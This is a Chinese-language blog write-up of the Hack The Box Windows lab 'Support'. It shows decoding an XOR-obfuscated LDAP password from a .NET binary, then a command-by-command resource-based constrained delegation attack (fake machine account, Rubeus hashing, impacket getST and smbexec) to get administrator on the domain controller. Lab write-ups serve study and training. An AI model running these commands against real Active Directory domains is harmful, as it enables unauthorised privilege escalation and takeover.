【Hack The Box】windows练习-- support

最新推荐文章于 2024-06-21 00:36:20 发布
最新推荐文章于 2024-06-21 00:36:20 发布
阅读量642 收藏
点赞数
分类专栏: Hack The Box 文章标签: windows java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/127840281
版权

HTB 学习笔记

【Hack The Box】windows练习-- support

🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月17日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

在这里插入图片描述

信息收集

53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman

dns,ker,rpc,smb,winrm

DC 域名“support.htb”

我看smb

在这里插入图片描述发现了很多的工具,都是通用的,也就是正常的,只有一个UserInfo.exe.zip
没有这么个软件,所以我将对他进行分析

下载所有文件到我本地查看

SMB:> mask ""
SMB:> recurse ON
SMB:> prompt OFF
SMB:> mget *

https://github.com/dnSpy/dnSpy/releases/tag/v6.1.8

去到自己的windows主机
发现了ldap的配置
然后只直接全部复制到随便哪里,搜索一些敏感字即可发现password
在这里插入图片描述

namespace UserInfo.Services
{
	// Token: 0x02000006 RID: 6
	internal class Protected
	{
		// Token: 0x0600000F RID: 15 RVA: 0x00002118 File Offset: 0x00000318
		public static string getPassword()
		{
			byte[] array = Convert.FromBase64String(Protected.enc_password);
			byte[] array2 = array;
			for (int i = 0; i < array.Length; i++)
			{
				array2[i] = (array[i] ^ Protected.key[i % Protected.key.Length] ^ 223);
			}
			return Encoding.Default.GetString(array2);
		}

		// Token: 0x04000005 RID: 5
		private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";

		// Token: 0x04000006 RID: 6
		private static byte[] key = Encoding.ASCII.GetBytes("armando");
	}

但是密码有加密,我们翻到最下面发现了

1. 加密规则
array2[i] = (array[i] ^ Protected.key[i % Protected.key.Length] ^ 223);
2. 加密密钥
private static byte[] key = Encoding.ASCII.GetBytes("armando");
3. 初始的密码
"0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";

import base64
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = "armando".encode("UTF-8") 
array = base64.b64decode(enc_password)
array2 = ""
for i in range(len(array)):
    array2 += chr(array[i] ^ key[i % len(key)] ^ 223) 
print(array2)

在这里插入图片描述
得到了密码,虽然我感觉不太对,这也太不正常了

nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

那么现在我拥有了ldap的凭证

我需要找到一个用户

ldapsearch -D support\\ldap -H ldap://10.129.14.124 -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=Users,DC=support,DC=htb' | grep info:

在这里插入图片描述

登陆

winrm登陆

上传SharpHound.exe
./sh.exe --memcache -c all -d SUPPORT.HTB -DomainController 127.0.0.1

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

基于 Kerberos 资源的约束委派

服务器端

将新的假计算机对象添加到 AD。
使用约束委派权限设置新的假计算机对象。
为新的假计算机生成密码哈希。

在这里插入图片描述
在这里插入图片描述
全攻击步骤如下

1. 上传文件
upload /home/user/Tools/Powermad/Powermad.ps1 pm.ps1
upload /home/user/Tools/Ghostpack-CompiledBinaries/Rubeus.exe r.exe
Import-Module ./pm.ps1

2.设置参数
Set-Variable -Name "FakePC" -Value "FAKE01"
Set-Variable -Name "targetComputer" -Value "DC"

3.添加一个新用户
New-MachineAccount -MachineAccount (Get-Variable -Name "FakePC").Value -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

4.给权限
Set-ADComputer (Get-Variable -Name "targetComputer").Value -PrincipalsAllowedToDelegateToAccount ((Get-Variable -Name "FakePC").Value + '$')

5.检查是否工作
Get-ADComputer (Get-Variable -Name "targetComputer").Value -Properties PrincipalsAllowedToDelegateToAccount

6. 生成hash,aes256
./r.exe hash /password:123456 /user:FAKE01$ /domain:support.htb

7. 以下kali执行-本机获取TGT票据
getST.py support.htb/FAKE01 -dc-ip dc.support.htb -impersonate administrator -spn http/dc.support.htb -aesKey 35CE465C01BC1577DE3410452165E5244779C17B64E6D89459C1EC3C8DAA362B

8.添加票据
export KRB5CCNAME=administrator.ccache

9.smbexec.py support.htb/administrator@dc.support.htb -no-pass -k

在这里插入图片描述

让我们为“fake01”计算机主体创建一个新的原始安全描述符。 请记住将 SID 更改为您刚刚找到的值以及 DomainComputer 的主机名。

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-1000)"

$SDBytes = New-Object byte[] ($SD.BinaryLength)

$SD.GetBinaryForm($SDBytes, 0)

Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

记得将 support.htb 和 dc.support.htb 添加到 /etc/hosts 文件中

在这里插入图片描述

#使用Impacket中的getTGT,生成ccached TGT,并使用KERB5CCNAME为请求的服务传递ccache文件。 

impacket-getST support.htb/fake01:123456 -dc-ip 10.129.14.217 -impersonate administrator -spn www/dc.support.htb

#设置KERB5CCNAME的局部变量以传递请求服务的ccache TGT文件。 

export KRB5CCNAME=administrator.ccache



#使用smbexec。py连接到我们刚刚作为用户管理员对服务器进行的TGT 

smbexec.py support.htb/administrator@dc.support.htb -no-pass -k

在这里插入图片描述

人间体佐菲
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Hack The Box - Help Writeup
qq_23026851的博客
01-30 3089
解题过程: nmap + nikto 扫描目标机,开放22,80,3000端口。并且找到80下的support/路径。 打开http://[ip]/support,发现一个叫HelpDeskZ的应用,源码:https://github.com/evolutionscript/HelpDeskZ-1.0/。该应用的submit ticket功能可以上传任意文件。虽然有file extension...
HackTheBox | Support
Purpose_7的博客
03-13 257
HackTheBox | Support
HackTheBox Support 逆向工程获取LDAP凭证,票证伪造提权
Ba1_Ma0的博客
11-07 777
"SHARED SUPPORT ACCOUNTS@SUPPORT.HTB"组对“DC.SUPPORT.HTB”具有“GenericAll”权限,我们可以访问的support用户是“SHARED SUPPORT ACCOUNTS@SUPPORT.HTB”组的成员,因此,我们给其他对象授予“DC.SUPPORT.HTB”的“GenericAll”权限,可以利用这个方法来提权。在这里可以看到用户账户的详细信息,通常来说info字段都是空的,这可能是用户的密码。使用内置的AD模块,给我们生成的计算机对象设置权限。
hackthebox - help (考点:node.js graphql查询 & helpdesk安全 & ubantu提权 )
冬萍子癸水
05-17 410
1 扫描 22想到可能有ssh登录,80是进web信息搜集,3000是node.js express,可以查询一些东西。 C:\root> nmap -A 10.10.10.121 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-16 19:56 EDT Nmap scan report for 10.10.10.121 Host is up (0.24s latency). Not shown: 997 closed ports PORT
Hack The Box——Scavenger
江左盟的博客
03-23 728
简介 信息收集 使用nmap 10.10.10.155 -A扫描目标主机,如图: 可以看到开启了很多端口(21,22,25,43,53,80)和对应的服务以及版本信息,操作系统是Debian,版本基本上是10.0左右了。 漏洞发现 使用searchsploit和Google搜索相关服务对应版本的漏洞,发现Exim smtpd 4.89存在远程命令执行漏洞(CVE-2017-16...
hack-browser-data-windows-64bit
05-12
这款工具支持多种主流浏览器,如 Chrome、Firefox、Edge、360、QQ、Brave 等,并且可以在 Windows、macOS 和 Linux 系统上运行。 安装和使用:对于 Windows 系统,安装过程非常简单。用户只需下载适用于 Windows 64...
Hack-the-Box-OSCP-Preparation:Hack-the-Box-OSCP-Preparation
03-20
介绍你好呀!如果您不认识我,我叫Rana Khalil,然后按Twitter句柄 。在花了将近八个月的时间,攻读了Offensive Security Certified Professional(OSCP)认证后,我很高兴地宣布我已获得OSCP官方认证!...
Hackthebox e Vulnhub - Dicas e Truques.pdf
10-06
网络安全渗透测试
HackTheBox-Writes-Ups:HackTheBox CTFC挑战写作
03-20
HackTheBox CTF /挑战写作将在这里下载。
HackTheBox靶机系列之困难Reel
04-09
HackTheBox靶机系列之困难Reel 本篇文章主要介绍了Reel靶机的整个利用过程,从侦察到提权,涵盖了渗透测试、漏洞利用、信息收集等多个方面的知识点。 侦察阶段 在Reel靶机中,我们首先进行了侦察,扫描了21、22、...
Userinfo(1to1)
weixin_43292547的博客
04-15 703
/xml配置文件/Hibernate的类的配置/Userinfo(1to1).javapackagecn.me.domain; importjava.util.Date; importjavax.persistence.Column; importjavax.persistence.Entity; importjavax.persistence.GeneratedValue; impor...
[HTB]HackTheBox-Pandora 渗透实战靶场
学习记录!大佬速速离开
04-17 1万+
🧟无风祭酒🧟 小医救人😈大医济世 ☣️先礼后兵☢️ 👻警👻 🦧文章为笔者学习所整理的内容,本意希望通过知识输出方式达到巩固、筑牢基础的效用。如若有过,还望大哥哥海涵。 微信公众号:acesec 🦾nmap扫描 🪶欢迎nmap急先锋大佬登场🛵: (nmap:“小样的!老弟一边站着,看哥哥我的表现~”) ┌──(root㉿kali)-[/home/kali/Desktop] └─# nmap -sS -p- -sC -sV -A --min-rate=5000 10.10.11...
连接hack the box教程
热门推荐
zr1213159840的博客
03-14 1万+
毕业论文终于告一段落了,虽然不是终版,但是终于能有点时间回来接着学点东西了,今天来连接hack the box靶场。 首先打开hack the box网址,然后注册,登录进去,开启靶场的话需要连接到hack the box。看右上角。 点击右上角,能看到有三种连接方式 我是使用kali进行连接的,所以点击第一个Machines 有两个选项,点击第一个openvpn,这个kali是自带这个功能的,我们点进去后,vpnaccess以及vpnserver都选择好,点击download vpn 然后会下载一
Hackthebox(1)系列持续更新
FryhRx的博客
04-14 4681
Hackthebox第一关 文章目录Hackthebox第一关前言一、Hackthebox配置openvpn?配置openvpn二、第0层(简单)终端弄好以后点击产卵机,然后会给你创建一个实例问题 1问题 2问题 3问题 4问题 5问题 6问题 7问题 82.拿flag总结 前言 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 一、Hackthebox配置openvpn? Hackthebox是国外的一个靶场。 配置
oscp——htb——Bank
王嘟嘟的博客
07-21 332
0x00 前言 0x01 信息收集 0x02 Web——Webshell 这里看到53 DNS开放,而且web是apache默认页面,应该是要进行一个域名的绑定。 这里为什么是bank.htb,我也不知道为啥,找了半天也没找到缘由。 10.10.10.29 bank.htb www.bank.htb ns.bank.htb chris.bank.htb 这里跑目录发现一个http://bank.htb/support.php 访问一下,将302改为200 这里从burp来看可以看的很清楚 这里上
HTB靶场系列 linux靶机 Nineveh靶机
m0_57221101的博客
01-17 4341
勘探 nmap勘探 nmap -sC -sV 10.10.10.43 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-26 16:22 CST Nmap scan report for 10.10.10.43 Host is up (0.36s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http
HTB靶场系列 Windows靶机 Slio靶机
m0_57221101的博客
01-27 3289
这台机器涉及到了oracle数据库,之前完全没有涉猎过,借此机会也是熟悉了一下这个数据库的操作方法;以及涉及到了关于内存取证方面的知识,正好上一次在美亚杯只是粗浅的学习了一下取证大师,则此也是借此机会好好的学习了一下取证相关知识 勘探 nmap -sC -sV 10.10.10.82 Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-09 13:15 CST Nmap scan report for 10.10.10.82 Host is up (0
策略模式编程
最新发布
一天一点点的专栏
06-21 618
接口定义:接口实现:@Service@Override@Override@Service@Override@Overrideservice定义:@Service@Autowired@Service@Autowiredclient 调用:} }
hackthebox - reel
11-03
HackTheBox - Reel是一个在黑客社区非常受欢迎的虚拟机靶场。这个靶场的目标是通过渗透测试和攻击手法,找到并获得系统的管理员权限。靶场基于漏洞存在和网络安全问题,提供了一个真实的环境来练习和提升安全技能。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值